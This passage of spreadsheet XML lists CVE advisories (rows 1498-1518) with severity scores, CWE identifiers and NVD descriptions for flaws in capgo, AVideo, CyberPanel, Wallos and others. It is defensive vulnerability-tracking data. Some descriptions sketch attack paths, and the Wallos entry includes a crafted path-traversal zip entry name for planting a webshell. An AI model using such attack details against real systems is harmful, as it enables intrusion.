      <c r="C1498" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1498" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1498" s="5" t="inlineStr"/>
      <c r="F1498" s="5" t="inlineStr"/>
      <c r="G1498" s="5" t="inlineStr"/>
      <c r="H1498" s="5" t="inlineStr"/>
      <c r="I1498" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1498" s="5" t="inlineStr"/>
      <c r="K1498" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1498" s="5" t="inlineStr">
        <is>
          <t>capgo.app (npm package `capgo`) through version 12.207.1 does not compare the caller's role rank against the requested role in the validateInvite() function of supabase/functions/_backend/private/invite_new_user_to_org.ts. The POST /private/invite_new_user_to_org endpoint only requires the org.update_user_roles permission for org_super_admin invitations, so an authenticated user holding only the org.invite_user permission (e.g., an org_member) can invite an external user as org_admin or org_billing_admin. When the invited account accepts the invitation via POST /private/accept_invitation, ensureOrgMembership creates the role binding using the Supabase service-role key, which bypasses the prevent_role_binding_priority_escalation and check_org_user_privileges database triggers. This allows privilege escalation resulting in full administrative control over the organization's apps, channels, members, and billing. The issue is addressed by pull request #3096, which compares the inviter's rank before permitting elevated invitations.</t>
        </is>
      </c>
      <c r="M1498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88863</t>
        </is>
      </c>
    </row>
    <row r="1499">
      <c r="A1499" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88865</t>
        </is>
      </c>
      <c r="C1499" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1499" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1499" s="5" t="inlineStr"/>
      <c r="F1499" s="5" t="inlineStr"/>
      <c r="G1499" s="5" t="inlineStr"/>
      <c r="H1499" s="5" t="inlineStr"/>
      <c r="I1499" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1499" s="5" t="inlineStr"/>
      <c r="K1499" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1499" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to validate restream ownership in getRestream.json.php, allowing authenticated users with canStream permission to mint tokens for arbitrary restreams. Attackers can exchange the token to retrieve other users' stream keys from getLiveKey.json.php and publish to their YouTube, Twitch, or RTMP destinations.</t>
        </is>
      </c>
      <c r="M1499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88865</t>
        </is>
      </c>
    </row>
    <row r="1500">
      <c r="A1500" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88895</t>
        </is>
      </c>
      <c r="C1500" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1500" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1500" s="5" t="inlineStr"/>
      <c r="F1500" s="5" t="inlineStr"/>
      <c r="G1500" s="5" t="inlineStr"/>
      <c r="H1500" s="5" t="inlineStr"/>
      <c r="I1500" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1500" s="5" t="inlineStr"/>
      <c r="K1500" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1500" s="5" t="inlineStr">
        <is>
          <t>CyberPanel before 3.0.5 fails to enforce two-factor authentication on API endpoints, allowing attackers to bypass TOTP requirements using password-derived tokens. Attackers who obtain an administrator's password can derive API tokens and perform administrative operations or create authenticated sessions without the second factor.</t>
        </is>
      </c>
      <c r="M1500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88895</t>
        </is>
      </c>
    </row>
    <row r="1501">
      <c r="A1501" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88937</t>
        </is>
      </c>
      <c r="C1501" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1501" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1501" s="5" t="inlineStr"/>
      <c r="F1501" s="5" t="inlineStr"/>
      <c r="G1501" s="5" t="inlineStr"/>
      <c r="H1501" s="5" t="inlineStr"/>
      <c r="I1501" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1501" s="5" t="inlineStr"/>
      <c r="K1501" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1501" s="5" t="inlineStr">
        <is>
          <t>knowns through 0.33.0 fails to properly validate template destination paths in the code generation template engine, allowing attackers to read and write arbitrary files outside the project root. Attackers can supply malicious templates that traverse directories to overwrite shell profiles, steal credentials, or achieve persistent code execution on victim systems.</t>
        </is>
      </c>
      <c r="M1501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88937</t>
        </is>
      </c>
    </row>
    <row r="1502">
      <c r="A1502" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11813</t>
        </is>
      </c>
      <c r="C1502" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1502" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1502" s="5" t="inlineStr"/>
      <c r="F1502" s="5" t="inlineStr"/>
      <c r="G1502" s="5" t="inlineStr"/>
      <c r="H1502" s="5" t="inlineStr"/>
      <c r="I1502" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1502" s="5" t="inlineStr"/>
      <c r="K1502" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="L1502" s="5" t="inlineStr">
        <is>
          <t>A potential improper permissions vulnerability was reported in the Lenovo Filez Client application that could allow a local authenticated user to escalate privileges.</t>
        </is>
      </c>
      <c r="M1502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11813</t>
        </is>
      </c>
    </row>
    <row r="1503">
      <c r="A1503" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12858</t>
        </is>
      </c>
      <c r="C1503" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1503" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1503" s="5" t="inlineStr"/>
      <c r="F1503" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1503" s="5" t="inlineStr"/>
      <c r="H1503" s="5" t="inlineStr"/>
      <c r="I1503" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1503" s="5" t="inlineStr"/>
      <c r="K1503" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1503" s="5" t="inlineStr">
        <is>
          <t>Improper Privilege Management vulnerability in ESET AV Remover (standalone) allows Privilege Escalation via especially crafted RPC.</t>
        </is>
      </c>
      <c r="M1503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12858</t>
        </is>
      </c>
    </row>
    <row r="1504">
      <c r="A1504" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16233</t>
        </is>
      </c>
      <c r="C1504" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1504" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1504" s="5" t="inlineStr"/>
      <c r="F1504" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1504" s="5" t="inlineStr"/>
      <c r="H1504" s="5" t="inlineStr">
        <is>
          <t>ni:labview</t>
        </is>
      </c>
      <c r="I1504" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1504" s="5" t="inlineStr"/>
      <c r="K1504" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1504" s="5" t="inlineStr">
        <is>
          <t>There is a memory corruption vulnerability recently
discovered in NI LabVIEW that may result in information disclosure or arbitrary
code execution.  Successful exploitation requires an attacker to get a
user to open a specially crafted VI.  This vulnerability affects NI
LabVIEW 2026 Q3 (26.3.0) and prior versions.</t>
        </is>
      </c>
      <c r="M1504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16233</t>
        </is>
      </c>
    </row>
    <row r="1505">
      <c r="A1505" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16234</t>
        </is>
      </c>
      <c r="C1505" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1505" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1505" s="5" t="inlineStr"/>
      <c r="F1505" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1505" s="5" t="inlineStr"/>
      <c r="H1505" s="5" t="inlineStr">
        <is>
          <t>ni:labview</t>
        </is>
      </c>
      <c r="I1505" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1505" s="5" t="inlineStr"/>
      <c r="K1505" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1505" s="5" t="inlineStr">
        <is>
          <t>There is a memory corruption vulnerability recently
discovered in NI LabVIEW that may result in information disclosure or arbitrary
code execution.  Successful exploitation requires an attacker to get a
user to open a specially crafted VI.  This vulnerability affects NI
LabVIEW 2026 Q3 (26.3.0) and prior versions.</t>
        </is>
      </c>
      <c r="M1505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16234</t>
        </is>
      </c>
    </row>
    <row r="1506">
      <c r="A1506" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17107</t>
        </is>
      </c>
      <c r="C1506" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1506" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1506" s="5" t="inlineStr"/>
      <c r="F1506" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1506" s="5" t="inlineStr">
        <is>
          <t>red hat, kubernetes</t>
        </is>
      </c>
      <c r="H1506" s="5" t="inlineStr"/>
      <c r="I1506" s="5" t="inlineStr">
        <is>
          <t>2026-07-24</t>
        </is>
      </c>
      <c r="J1506" s="5" t="inlineStr"/>
      <c r="K1506" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L1506" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the cluster-proxy service-proxy component used in Red Hat Advanced Cluster Management for Kubernetes (RHACM) and multicluster-engine (MCE). The service-proxy appends impersonation group headers to proxied requests without first removing caller-supplied values, and the spoke ServiceAccount holds unrestricted impersonation permissions. An authenticated hub principal can inject an Impersonate-Group header to escalate to cluster-admin on every managed cluster.</t>
        </is>
      </c>
      <c r="M1506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17107</t>
        </is>
      </c>
    </row>
    <row r="1507">
      <c r="A1507" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23929</t>
        </is>
      </c>
      <c r="C1507" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1507" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1507" s="5" t="inlineStr"/>
      <c r="F1507" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1507" s="5" t="inlineStr"/>
      <c r="H1507" s="5" t="inlineStr">
        <is>
          <t>zabbix:zabbix</t>
        </is>
      </c>
      <c r="I1507" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1507" s="5" t="inlineStr"/>
      <c r="K1507" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L1507" s="5" t="inlineStr">
        <is>
          <t>Prototype pollution vulnerability in searchParamsToObject() is leading to a persistent XSS in Maps. URL parameter processing was not filtering dangerous properties like __proto__, combined with jQuery's unsafe element creation that traversed the prototype chain.</t>
        </is>
      </c>
      <c r="M1507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23929</t>
        </is>
      </c>
    </row>
    <row r="1508">
      <c r="A1508" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45221</t>
        </is>
      </c>
      <c r="C1508" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1508" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1508" s="5" t="inlineStr"/>
      <c r="F1508" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1508" s="5" t="inlineStr">
        <is>
          <t>windows, openssl</t>
        </is>
      </c>
      <c r="H1508" s="5" t="inlineStr"/>
      <c r="I1508" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1508" s="5" t="inlineStr"/>
      <c r="K1508" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L1508" s="5" t="inlineStr">
        <is>
          <t>Konga before 2.1.0 contains a privilege escalation vulnerability that allows low-privileged local attackers to execute arbitrary code by planting attacker-controlled OpenSSL configuration or library files in a hardcoded filesystem path absent from default installations. On Windows, the missing directory resides in a location writable by any authenticated local user, enabling attackers to create the directory and place malicious files that execute at the privilege level of the user or service account that launches Konga, facilitating privilege escalation.</t>
        </is>
      </c>
      <c r="M1508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45221</t>
        </is>
      </c>
    </row>
    <row r="1509">
      <c r="A1509" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45414</t>
        </is>
      </c>
      <c r="C1509" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1509" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1509" s="5" t="inlineStr"/>
      <c r="F1509" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1509" s="5" t="inlineStr"/>
      <c r="H1509" s="5" t="inlineStr"/>
      <c r="I1509" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1509" s="5" t="inlineStr"/>
      <c r="K1509" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L1509" s="5" t="inlineStr">
        <is>
          <t>Decidim is a participatory democracy framework. Prior to 0.31.5 and in 0.32.0.rc1 before 0.32.0.rc2, JWT-backed API authentication is not bound to the organization selected by the current host, allowing a JWT issued for one tenant to be replayed against another tenant’s API to read participantDetails data and reach the proposal.answer mutation path. This issue is fixed in versions 0.31.5 and 0.32.0.rc2.</t>
        </is>
      </c>
      <c r="M1509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45414</t>
        </is>
      </c>
    </row>
    <row r="1510">
      <c r="A1510" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4644</t>
        </is>
      </c>
      <c r="C1510" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1510" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1510" s="5" t="inlineStr"/>
      <c r="F1510" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1510" s="5" t="inlineStr"/>
      <c r="H1510" s="5" t="inlineStr"/>
      <c r="I1510" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1510" s="5" t="inlineStr"/>
      <c r="K1510" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1510" s="5" t="inlineStr">
        <is>
          <t>A Missing Authorization vulnerability in HTTP Connector in Google Cloud Integration Connectors versions prior to 2025-12-11 on Google Cloud Platform allows an authenticated user to escalate privileges and take over a Google Cloud Project using unauthorized service account attachment.
This vulnerability was patched on 11 December 2025, and no customer action is needed.</t>
        </is>
      </c>
      <c r="M1510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4644</t>
        </is>
      </c>
    </row>
    <row r="1511">
      <c r="A1511" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48113</t>
        </is>
      </c>
      <c r="C1511" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1511" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1511" s="5" t="inlineStr"/>
      <c r="F1511" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1511" s="5" t="inlineStr"/>
      <c r="H1511" s="5" t="inlineStr"/>
      <c r="I1511" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1511" s="5" t="inlineStr"/>
      <c r="K1511" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1511" s="5" t="inlineStr">
        <is>
          <t>Chisel is a TCP/UDP tunnel, transported over HTTP and secured via SSH. In versions prior to 1.11.5, authenticated clients can bypass --authfile ACL restrictions and tunnel traffic to arbitrary destinations reachable from the server. The ACL is enforced only during the initial handshake against declared remotes, but never on subsequent SSH channels that carry actual traffic. A malicious client can authenticate with a permitted remote, then open channels to any host:port it wants. This issue has been fixed in version 1.11.5.</t>
        </is>
      </c>
      <c r="M1511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48113</t>
        </is>
      </c>
    </row>
    <row r="1512">
      <c r="A1512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54606</t>
        </is>
      </c>
      <c r="C1512" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1512" s="5" t="inlineStr"/>
      <c r="F1512" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1512" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1512" s="5" t="inlineStr"/>
      <c r="I1512" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1512" s="5" t="inlineStr"/>
      <c r="K1512" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1512" s="5" t="inlineStr">
        <is>
          <t>SunEditor is a lightweight and powerful WYSIWYG editor in vanilla JavaScript with no dependencies. Prior to 3.1.4, the SunEditor Embed plugin in src/plugins/modal/embed.js parses attacker-controlled raw embed HTML with DOMParser and processes the resulting DOM nodes. When an external script element follows a valid iframe, the plugin recreates a script element from the attacker-controlled src attribute and appends it to the live DOM, causing JavaScript execution in the editor page. If an application stores or reflects SunEditor content without additional backend sanitization, an attacker who can submit embed HTML can trigger stored or reflected cross-site scripting when another user opens, previews, renders, or edits the content, enabling access to page data and account actions as the victim. This issue is fixed in version 3.1.4.</t>
        </is>
      </c>
      <c r="M1512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54606</t>
        </is>
      </c>
    </row>
    <row r="1513">
      <c r="A1513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55108</t>
        </is>
      </c>
      <c r="C1513" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1513" s="5" t="inlineStr"/>
      <c r="F1513" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1513" s="5" t="inlineStr"/>
      <c r="H1513" s="5" t="inlineStr"/>
      <c r="I1513" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1513" s="5" t="inlineStr"/>
      <c r="K1513" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-59</t>
        </is>
      </c>
      <c r="L1513" s="5" t="inlineStr">
        <is>
          <t>KubeVela is an open source application delivery platform. Prior to 1.9.14, from 1.10.0-alpha.1 until 1.10.9, and from 1.11.0-alpha.1 until 1.11.0-alpha.4, the Terraform remote configuration loader in pkg/controller/utils/capability.go, GetTerraformConfigurationFromRemote, clones a repository supplied through a core.oam.dev/v1beta1 ComponentDefinition and follows repository-controlled variables.tf or main.tf symlinks. A user with permission to create or update ComponentDefinition objects can point variables.tf to /dev/zero through terraform.path, after which os.Stat and os.ReadFile follow the link and read an unbounded stream before ParseTerraformVariables or HCL parsing can reject the content. The read can exhaust memory, OOM-kill the cluster-wide vela-core controller, cause repeated Pod restarts, and pressure node memory when no effective container limit is configured. This issue is fixed in versions 1.9.14, 1.10.9, and 1.11.0-alpha.4.</t>
        </is>
      </c>
      <c r="M1513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55108</t>
        </is>
      </c>
    </row>
    <row r="1514">
      <c r="A1514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55526</t>
        </is>
      </c>
      <c r="C1514" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1514" s="5" t="inlineStr"/>
      <c r="F1514" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1514" s="5" t="inlineStr"/>
      <c r="H1514" s="5" t="inlineStr"/>
      <c r="I1514" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1514" s="5" t="inlineStr"/>
      <c r="K1514" s="5" t="inlineStr">
        <is>
          <t>CWE-350, CWE-918</t>
        </is>
      </c>
      <c r="L1514" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, spider_tools._host_is_blocked() does not resolve ordinary hostnames before scrape_page fetches them. A hostname such as 127.0.0.1.nip.io passes validation and resolves to loopback, permitting internal HTTP access. The fix uses socket.getaddrinfo and fails closed on DNS errors. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="M1514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55526</t>
        </is>
      </c>
    </row>
    <row r="1515">
      <c r="A1515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57485</t>
        </is>
      </c>
      <c r="C1515" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1515" s="5" t="inlineStr"/>
      <c r="F1515" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1515" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1515" s="5" t="inlineStr"/>
      <c r="I1515" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1515" s="5" t="inlineStr"/>
      <c r="K1515" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522</t>
        </is>
      </c>
      <c r="L1515" s="5" t="inlineStr">
        <is>
          <t>Stirling-PDF is a locally hosted web application that facilitates various operations on PDF files. Prior to 2.9.0, the /api/v1/pipeline/handleData endpoint in app/core/src/main/java/stirling/software/SPDF/controller/api/pipeline/PipelineProcessor.java injects the STIRLING-PDF-BACKEND-API-USER API key into pipeline subrequests, allowing an authenticated ROLE_USER to retrieve the key through /api/v1/user/get-api-key, impersonate the internal service account, bypass normal rate limits, and access internal endpoints including /api/v1/info/requests/all and /api/v1/info/load/all. This issue is fixed in version 2.9.0.</t>
        </is>
      </c>
      <c r="M1515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57485</t>
        </is>
      </c>
    </row>
    <row r="1516">
      <c r="A1516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58113</t>
        </is>
      </c>
      <c r="C1516" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1516" s="5" t="inlineStr"/>
      <c r="F1516" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1516" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1516" s="5" t="inlineStr"/>
      <c r="I1516" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1516" s="5" t="inlineStr"/>
      <c r="K1516" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1516" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Teamcenter V2412 (All versions &lt; V2412.0013), Teamcenter V2506 (All versions &lt; V2506.0010), Teamcenter V2512 (All versions &lt; V2512.2607), Teamcenter V2606 (All versions &lt; V2606.2607). Affected applications do not properly encode user-supplied input reflected into HTML attribute contexts within the authentication redirect flow (/auth/ endpoint).
This could allow an unauthenticated remote attacker to inject arbitrary JavaScript into the browser of an authenticated user who loads a crafted URL, enabling the attacker to perform actions within the victim's Teamcenter session.</t>
        </is>
      </c>
      <c r="M1516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58113</t>
        </is>
      </c>
    </row>
    <row r="1517">
      <c r="A1517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61639</t>
        </is>
      </c>
      <c r="C1517" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1517" s="5" t="inlineStr"/>
      <c r="F1517" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1517" s="5" t="inlineStr"/>
      <c r="H1517" s="5" t="inlineStr"/>
      <c r="I1517" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1517" s="5" t="inlineStr"/>
      <c r="K1517" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1517" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.6, POST /endpoints/db/restore.php calls ZipArchive::extractTo() without validating entry names for ../ sequences. Admin uploads crafted zip with entry logos/../../endpoints/shell.php to write webshell to webroot. Extension filter only applies to post-extraction logo copy step. This issue has been patched in version 4.9.6.</t>
        </is>
      </c>
      <c r="M1517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61639</t>
        </is>
      </c>
    </row>
    <row r="1518">
      <c r="A1518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61640</t>
        </is>
      </c>
      <c r="C1518" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="D1518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1518" s="5" t="inlineStr"/>
      <c r="F1518" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1518" s="5" t="inlineStr"/>
      <c r="H1518" s="5" t="inlineStr"/>
      <c r="I1518" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1518" s="5" t="inlineStr"/>
      <c r="K1518" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1518" s="5" t="inlineStr">
        <is>
